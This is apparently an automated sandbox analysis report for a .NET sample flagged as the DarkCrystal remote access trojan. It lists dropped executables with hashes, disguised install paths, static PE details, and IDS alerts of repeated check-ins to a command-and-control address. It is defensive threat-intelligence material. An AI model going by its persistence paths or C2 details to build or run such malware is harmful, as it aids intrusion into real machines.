Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\wQvXwsjz.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wYfqbcKE.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\whTRrWrT.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xevZNWFO.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\ybRYxLPz.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\zNBzlFlK.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zssgqxCT.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\SysWOW64\sr-Latn-RS\0569fd69283a46

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	5.165072115424298
Encrypted:	false
SSDEEP:	3:3gc3uk3ttlH2kQN2TJYbXoKyXko:J3pbljQkTJYEKyXH
MD5:	3B1039365AF7B7A584F8B17C7EBC09AB
SHA1:	3D807ED286792E6FF5FE3BC7946C84D540A7CFAF
SHA-256:	2DDB3DA2B8F1221664AF1922C7ACF5EE279E97E00D23FC66D99CF3433A040CFB
SHA-512:	B8869F6DE5B3129C3C96A1ACF438DF6CB3AFAD4A4D2624B494451A693672D76BAF5F2A045F35E10E7AABB39F8BF1A0669A48DFFC55F39022055358F4527DDF26
Malicious:	false
Preview:	OiIvqE9TFWOuSu4MHj3PCqg8sn5RHJI1YjGL4bRUY8bWA5jdmvqS6LBiBKCCIrM6OXWsnsRqSj

C:\Windows\SysWOW64\sr-Latn-RS\hjAOLvfTLePJensZtANoSVrh.exe

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1914880
Entropy (8bit):	7.537245081602837
Encrypted:	false
SSDEEP:	24576:Ns665jgyrw+2b5mhqAYimWuEHWLE0YEB9UMUBf1OXrsjAm9psqYLz2E2N:NGJ5YdB4WLvv9U3wX0AysqYL4
MD5:	67247063BFBF3EEDFDFD183E8235A5E8
SHA1:	B64EA61F13D24490DF89A9DCA8F42273A7F6C034
SHA-256:	1F95432AB7C23F582ACBB0E94D153813D030D74EA12ECEF3DF325EF5583A8015
SHA-512:	CC2B9C6A09103B6A4768FE8DF27DDD5569385CEC52B11835930D02DE42D6D5350D6FB0FCCF742B993D57CB4920E9B084C7DB295A3F95C76B6EC6805F13D8C3F0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8dg.................0..........^N... ...`....@.. ....................................@..................................N..K....`.. ............................................................................ ............... ..H............text...d.... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B................@N......H.......D..............0...?o...M.......................................0..........(.... ........8........E...........N.......8....(.... ....~....{z...9....& ....8....(.... ....~....{....9....& ....8....(.... ....8........0.......... ........8........E................y...P...8....~....(O... .... .... ....s....~....(S....... ....~....{b...9....& ....8....~....:O... ....~....{....9y...& ....8n......... ....~....{....:T...& ....8I...r...ps....z*....~....(W...~....([... ....?.

C:\Windows\SysWOW64\sr-Latn-RS\hjAOLvfTLePJensZtANoSVrh.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.75682811645638
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXlafpvBVtFy6vpo2XKvj:Vx993DEUacvBrFy328
MD5:	928EBB145C894DC183DB79FF594944AA
SHA1:	D5805261BC51D93A2728E389A568AD09368BB195
SHA-256:	4B80BFCC74226BDAA7CDA03BEDACC80075B690AE512539A920ED3CCBE2C0CC0F
SHA-512:	B3AE411824092136683A8A11AB704AA6F88811B07EACE92EDCBE143025F675BC718ED39D66120E5FC169EF4315C94B6AFCF8503F6FAEBCE8DB9CAB300197306E
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 26/12/2024 06:03:03..06:03:03, error: 0x80072746.06:03:08, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.537245081602837
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	67VB5TS184.exe
File size:	1'914'880 bytes
MD5:	67247063bfbf3eedfdfd183e8235a5e8
SHA1:	b64ea61f13d24490df89a9dca8f42273a7f6c034
SHA256:	1f95432ab7c23f582acbb0e94d153813d030d74ea12ecef3df325ef5583a8015
SHA512:	cc2b9c6a09103b6a4768fe8df27ddd5569385cec52b11835930d02de42d6d5350d6fb0fccf742b993d57cb4920e9b084c7db295a3f95c76b6ec6805f13d8c3f0
SSDEEP:	24576:Ns665jgyrw+2b5mhqAYimWuEHWLE0YEB9UMUBf1OXrsjAm9psqYLz2E2N:NGJ5YdB4WLvv9U3wX0AysqYL4
TLSH:	A395AE1EA5E24E73C2A5577286A7013D82A0D7653952EB0B350F20D2AD4BBF18F721F7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8dg.................0..........^N... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x5d4e5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x676438B6 [Thu Dec 19 15:16:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d4e10	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d6000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1d2e64	0x1d3000	2d07a4682396dddcf6901900203dd6f2	False	0.7783030605928801	data	7.540715561915618	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1d6000	0x320	0x400	3720f37e3ecb95f78fcf18a649002524	False	0.3525390625	data	2.6537284131589467	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1d8000	0xc	0x200	3a409dec55f6d8faca6722497a1d1186	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1d6058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T10:22:10.901805+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49712	104.21.38.84	80	TCP
2024-12-26T10:22:23.573733+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49726	104.21.38.84	80	TCP
2024-12-26T10:22:36.542519+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49757	104.21.38.84	80	TCP
2024-12-26T10:22:44.995658+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49773	104.21.38.84	80	TCP
2024-12-26T10:22:57.995678+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49805	104.21.38.84	80	TCP
2024-12-26T10:23:10.761385+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49834	104.21.38.84	80	TCP
2024-12-26T10:23:23.277101+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49865	104.21.38.84	80	TCP
2024-12-26T10:23:35.792694+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49894	104.21.38.84	80	TCP
2024-12-26T10:23:44.261485+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49915	104.21.38.84	80	TCP
2024-12-26T10:23:56.589807+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49943	104.21.38.84	80	TCP
2024-12-26T10:24:05.730290+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49964	104.21.38.84	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 10:22:09.626271009 CET	49712	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:09.746824026 CET	80	49712	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:09.746918917 CET	49712	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:09.747394085 CET	49712	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:09.866925001 CET	80	49712	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:10.105778933 CET	49712	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:10.225714922 CET	80	49712	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:10.857481956 CET	80	49712	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:10.901804924 CET	49712	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:11.206784964 CET	80	49712	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:11.206810951 CET	80	49712	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:11.206877947 CET	49712	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:11.520503998 CET	49712	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:22.323409081 CET	49726	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:22.443195105 CET	80	49726	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:22.443298101 CET	49726	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:22.445460081 CET	49726	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:22.565310001 CET	80	49726	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:22.792725086 CET	49726	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:22.912406921 CET	80	49726	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:23.529555082 CET	80	49726	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:23.573733091 CET	49726	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:23.854340076 CET	80	49726	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:23.854393959 CET	80	49726	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:23.854505062 CET	49726	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:24.071547985 CET	49726	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:35.296516895 CET	49757	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:35.416119099 CET	80	49757	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:35.416270018 CET	49757	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:35.416728973 CET	49757	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:35.536228895 CET	80	49757	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:35.761626005 CET	49757	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:35.881135941 CET	80	49757	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:36.501286983 CET	80	49757	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:36.542519093 CET	49757	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:36.828895092 CET	80	49757	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:36.828928947 CET	80	49757	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:36.829018116 CET	49757	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:37.064848900 CET	49757	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:43.742974043 CET	49773	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:43.862741947 CET	80	49773	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:43.862943888 CET	49773	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:43.863332987 CET	49773	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:43.983119011 CET	80	49773	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:44.214843988 CET	49773	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:44.334512949 CET	80	49773	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:44.948236942 CET	80	49773	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:44.995657921 CET	49773	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:45.278744936 CET	80	49773	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:45.278812885 CET	80	49773	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:45.278881073 CET	49773	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:45.522991896 CET	49773	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:56.741967916 CET	49805	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:56.861591101 CET	80	49805	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:56.864453077 CET	49805	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:56.864846945 CET	49805	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:56.984335899 CET	80	49805	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:57.214713097 CET	49805	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:57.334325075 CET	80	49805	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:57.951976061 CET	80	49805	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:57.995677948 CET	49805	80	192.168.2.5	104.21.38.84
Dec 26, 2024 10:22:58.293488026 CET	80	49805	104.21.38.84	192.168.2.5
Dec 26, 2024 10:22:58.293549061 CET	80	49805	104.21.38.84	192.168.2.5
